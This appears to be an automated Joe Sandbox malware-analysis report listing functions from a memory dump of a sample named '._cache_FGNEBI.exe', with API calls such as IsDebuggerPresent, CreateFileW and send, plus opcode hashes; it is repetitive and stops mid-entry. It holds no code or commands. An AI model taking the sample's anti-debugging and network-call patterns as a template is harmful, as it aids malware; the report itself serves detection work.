API ID: MessageSend$Timeout_strlen
String ID:
API String ID: 2777139624-0
Opcode ID: c05dba99c6f1bd26de5f873e8d39b439cf8202d61274ba774ccc1a04ab62037c
Instruction ID: c954ead8362b09c6a3578b0d066d02658a5570150fd9a3153736f47f36412d10
Opcode Fuzzy Hash: c05dba99c6f1bd26de5f873e8d39b439cf8202d61274ba774ccc1a04ab62037c
Instruction Fuzzy Hash: 5B11C671600206ABDF05BFA9DC86EFF7BA8DF45340B00443EF606DB192DE64A84697B0

Function 00D93682 Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

74B1C8D0.UXTHEME ref: 00D936E6

Part of subcall function 00DB2025: __lock.LIBCMT ref: 00DB202B

Part of subcall function 00D932DE: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00D932F6
Part of subcall function 00D932DE: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00D9330B

Part of subcall function 00D9374E: GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 00D9376D
Part of subcall function 00D9374E: IsDebuggerPresent.KERNEL32(?,?), ref: 00D9377F
Part of subcall function 00D9374E: GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\._cache_FGNEBI.exe,00000104,?,00E51120,C:\Users\user\Desktop\._cache_FGNEBI.exe,00E51124,?,?), ref: 00D937EE
Part of subcall function 00D9374E: SetCurrentDirectoryW.KERNEL32(?), ref: 00D93860

SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 00D93726

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectory$DebuggerFullNamePathPresent__lock
String ID:
API String ID: 3809921791-0
Opcode ID: 1051f8cce441802444c1000d020bb3ea96b5bd98c92e390f71d6bd1c87b7794a
Instruction ID: 4d0f2825fecdd573cfbbd620aad76984905ef14220f3522ee2d09946a9c7e3fa
Opcode Fuzzy Hash: 1051f8cce441802444c1000d020bb3ea96b5bd98c92e390f71d6bd1c87b7794a
Instruction Fuzzy Hash: 491190719083419FC704EF6ADC45A5EBBE8FB85711F004D1EF445972B1DB709548CBA2

Function 00D94B88 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000001,?,00D94C2B,?,?,?,?,00D9BE63), ref: 00D94BB6
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000001,?,00D94C2B,?,?,?,?,00D9BE63), ref: 00E04972

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: d6415c48c381aba5df27baffcf8d708a22a9590a94c7c866b3c7837a8d35155a
Instruction ID: dd9430b6a789d637c6d28010d67d391b618f0f5d955c2f5ef29fdd3d76776a52
Opcode Fuzzy Hash: d6415c48c381aba5df27baffcf8d708a22a9590a94c7c866b3c7837a8d35155a
Instruction Fuzzy Hash: BB019670248308BEF7245E18CD8AF6637DCEB1576CF148315BAE46A1E1C6B05C45CB20

Function 00DAF26B Relevance: 3.1, APIs: 2, Instructions: 52COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00DDAEA5,?,?,00000000,00000008), ref: 00DAF282
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00DDAEA5,?,?,00000000,00000008), ref: 00DAF2A6

Part of subcall function 00DAF2D0: _memmove.LIBCMT ref: 00DAF307

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: ByteCharMultiWide$_memmove
String ID:
API String ID: 3033907384-0
Opcode ID: 990b77f08e754bd3883a9937fbe4ae62826619688a765290b021b6f28449d9eb
Instruction ID: 30f7a709ca4dd859720b6683b0276b85a4d3192896c43421c51e820a62e26ab9
Opcode Fuzzy Hash: 990b77f08e754bd3883a9937fbe4ae62826619688a765290b021b6f28449d9eb
Instruction Fuzzy Hash: 15F04FB6105114BFAB14AFA6DC44DBB7FADEF8A3607008066FD09CA111DA31DC018675

Function 00DBF782 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

___lock_fhandle.LIBCMT ref: 00DBF7D9
__close_nolock.LIBCMT ref: 00DBF7F2

Part of subcall function 00DB886A: __getptd_noexit.LIBCMT ref: 00DB886A

Part of subcall function 00DB889E: __getptd_noexit.LIBCMT ref: 00DB889E

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: __getptd_noexit$___lock_fhandle__close_nolock
String ID:
API String ID: 1046115767-0
Opcode ID: af3bf1d6e2c15c5a79a16809afa9290faba08a1a9111cf074b0854ee3ab524eb
Instruction ID: cdb271135fa541eb64c0324e7b2ff46f2e8163f6c790b697fdbaa15775e30bb9
Opcode Fuzzy Hash: af3bf1d6e2c15c5a79a16809afa9290faba08a1a9111cf074b0854ee3ab524eb
Instruction Fuzzy Hash: 6211A0B6805610CFD7117F64AC413D87A90EF82331F550264E4636F1E2CBB49900D6B1

Function 00D934F3 Relevance: 3.0, APIs: 2, Instructions: 49COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00D9352A

Part of subcall function 00D97E53: _memmove.LIBCMT ref: 00D97EB9

_wcscat.LIBCMT ref: 00E066C0

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: FullNamePath_memmove_wcscat
String ID:
API String ID: 257928180-0
Opcode ID: 0d66d0bfd4f19f144e8ac81aa7fde3a684684f70b6d5a7a6dbb6967b22b2707c
Instruction ID: 463c14a1c9a565bcb0d7e371f9fa35ac88e2c75a40638968e23fc31c0e9da796
Opcode Fuzzy Hash: 0d66d0bfd4f19f144e8ac81aa7fde3a684684f70b6d5a7a6dbb6967b22b2707c
Instruction Fuzzy Hash: 6501847194410DABCF40FBA4D846ADD73F9EF18348F0145A5B926E7190EA309B858BB1

Function 00DE9500 Relevance: 3.0, APIs: 2, Instructions: 46networkCOMMON

Download Yara Rule

APIs

send.WS2_32(00000000,?,00000000,00000000), ref: 00DE9534
WSAGetLastError.WS2_32(00000000,?,00000000,00000000), ref: 00DE9557

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: ErrorLastsend
String ID:
API String ID: 1802528911-0
Opcode ID: 64b3fec8d8e5e32e63d7d822a5d51a4c5c940f0a893e706c4f943ca7aebe5cc2
Instruction ID: 5ddce0d9316dc1d68893b940cd0ef2182e51cbdf6c1bee77fb9695559b1baa81
Opcode Fuzzy Hash: 64b3fec8d8e5e32e63d7d822a5d51a4c5c940f0a893e706c4f943ca7aebe5cc2
Instruction Fuzzy Hash: 11017C35204200AFCB10EF29C891B6AB7E9EB89724F11852AF65A87391CB70EC05CB70

Function 00DB4274 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00DB889E: __getptd_noexit.LIBCMT ref: 00DB889E

__lock_file.LIBCMT ref: 00DB42B9

Part of subcall function 00DB5A9F: __lock.LIBCMT ref: 00DB5AC2

__fclose_nolock.LIBCMT ref: 00DB42C4

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: db92cf195b4b14345f550b22b9a2d55cf03876e21ea98cee25ed18e30525653c
Instruction ID: d16f88d1886c7028edccd1c8d6b6e4d5239ea6c136f5761cc9c7bbdd3f8c8b5a
Opcode Fuzzy Hash: db92cf195b4b14345f550b22b9a2d55cf03876e21ea98cee25ed18e30525653c
Instruction Fuzzy Hash: 4CF09031801714EBDB10EB7588027DE6BD0EF81334F258209B867AB1C2CB7C9901AB79

Function 00DAF55E Relevance: 3.0, APIs: 2, Instructions: 29sleeptimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00DAF57A

Part of subcall function 00D9E1F0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D9E279

Sleep.KERNEL32(00000000), ref: 00E075D3

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: MessagePeekSleepTimetime
String ID:
API String ID: 1792118007-0
Opcode ID: 3d5263e72467e5d479ae4d57acf53633124a90c618bb0c48ed77b1833dcb6df4
Instruction ID: 3304a9ff55b864ad9f689942087eca068d14abd4e3fd3597326956c14a98f5f5
Opcode Fuzzy Hash: 3d5263e72467e5d479ae4d57acf53633124a90c618bb0c48ed77b1833dcb6df4
Instruction Fuzzy Hash: A7F08C712446149FD314EF69D805B96BBE8EF48320F00442AF85AE7291DB70A800CBF0

Function 00D981C6 Relevance: 1.9, APIs: 1, Instructions: 438COMMON

Download Yara Rule

APIs

Part of subcall function 00D984A6: __swprintf.LIBCMT ref: 00D984E5
Part of subcall function 00D984A6: __itow.LIBCMT ref: 00D98519

__wcsnicmp.LIBCMT ref: 00D983C4

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: __itow__swprintf__wcsnicmp
String ID:
API String ID: 712828618-0
Opcode ID: e260f32b362f40a490229fbc4edb8b40ed79d01c0f08b473291f62ec8f55089f
Instruction ID: ee20b55828103f919125327eaf97ca612aed8892e862348be9ccc9c884e2c581
Opcode Fuzzy Hash: e260f32b362f40a490229fbc4edb8b40ed79d01c0f08b473291f62ec8f55089f
Instruction Fuzzy Hash: A1F18C71508302AFCB04DF58C88186FBBE5FF9A704F54891DF98697261EB30E945DBA2

Function 00DA4040 Relevance: 1.7, APIs: 1, Instructions: 187COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ca599920e64f453315c057626f71e299ebb78824d6afaa63b8979ad9d3f7f0c
Instruction ID: cbe596a86a28e5549c41a825292977c04a5bdd2f28ef99f4a0df0ffe57327708
Opcode Fuzzy Hash: 9ca599920e64f453315c057626f71e299ebb78824d6afaa63b8979ad9d3f7f0c
Instruction Fuzzy Hash: D661B0B0A042069FCB04DF58C880A7AF7E5FF5A314F148669E956C7281E7B0EC95CBB1

Function 00DAEF0D Relevance: 1.7, APIs: 1, Instructions: 176COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 457f367bb789475499251a65116b92089774c8124e54c15ba381055526ec3b2a
Instruction ID: 7dd5e6e6d2c710c1fa02ce148438a0bfe411ea96009bdc874c59496db5bd2c71
Opcode Fuzzy Hash: 457f367bb789475499251a65116b92089774c8124e54c15ba381055526ec3b2a
Instruction Fuzzy Hash: 68519535700214AFCF14EFA8C991EAD77A6EF89314B1481A9F546AB392DB30ED41D770

Function 00D9B6D0 Relevance: 1.6, APIs: 1, Instructions: 118COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00D9B7C2

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 653a53b8435a0736043d6b22074b13ebbbade5d52c540747a625e5d2bf85aa42
Instruction ID: ebb94063e0c4d92983ec7862b35771cb0f56dcb5d022ee5ab0bc22926ccc4974
Opcode Fuzzy Hash: 653a53b8435a0736043d6b22074b13ebbbade5d52c540747a625e5d2bf85aa42
Instruction Fuzzy Hash: 4D41DF79200702CFCB24DF59E580A62F7E0FF88360715C66EE89A8B761D730E851CB60

Function 00D94EE9 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00D94F8F

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 1acb80455425ac55aaae9abb3f0dfea20a5f035359b0478e6b769f3b62da728d
Instruction ID: a3b8e8faa09811ff4bfe03f59014acf36035e1166a2a03a0b88ca4f65692f853
Opcode Fuzzy Hash: 1acb80455425ac55aaae9abb3f0dfea20a5f035359b0478e6b769f3b62da728d
Instruction Fuzzy Hash: 32315971A00616AFCF08CF6CC480AADB7B5FF88314F188629E81993751D770F9A1CBA0

Function 00DAF92C Relevance: 1.6, APIs: 1, Instructions: 94COMMON

Download Yara Rule

APIs

select.WS2_32 ref: 00DAF9DB

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: select
String ID:
API String ID: 1274211008-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 92d058641ebbb61dd99147b96147cc53d4f1f952256923701697adf6b29be8c6
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 5C31B571A00106ABD718DF98D480A6EFBB5FB4A310B2886E5E489CB255D731EDC1CFE0

Function 00E0AA5A Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00E0AA65

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 90a7af18731cdb108e847fe927e9a35eb4e1852cf2f96f877539e32a769b4bb0
Instruction ID: 84ce4106f497bc4fc48206ec784743d4cb376cccb1d74a9cbe71d6934108ac2c
Opcode Fuzzy Hash: 90a7af18731cdb108e847fe927e9a35eb4e1852cf2f96f877539e32a769b4bb0
Instruction Fuzzy Hash: 90414E74504751CFEB24CF18C444B1ABBE1BF89348F1985ACE9965B362C372E885CF62

Function 00D94D67 Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00D94DAD

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: eec6568c36c7c1f27129388b407aa3a0be13dbc1b97fab6eb9bebea6acdb2561
Instruction ID: 365cb6d6ed8726b26e710bef8bb68233030c2025dc82f9b7a078557a897e57ba
Opcode Fuzzy Hash: eec6568c36c7c1f27129388b407aa3a0be13dbc1b97fab6eb9bebea6acdb2561
Instruction Fuzzy Hash: 872105F0A00604EBCF149F56E944AA97FF8FB56340F25886EE586E5090EB3095D1C725

Function 00D9D805 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00D9D837

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
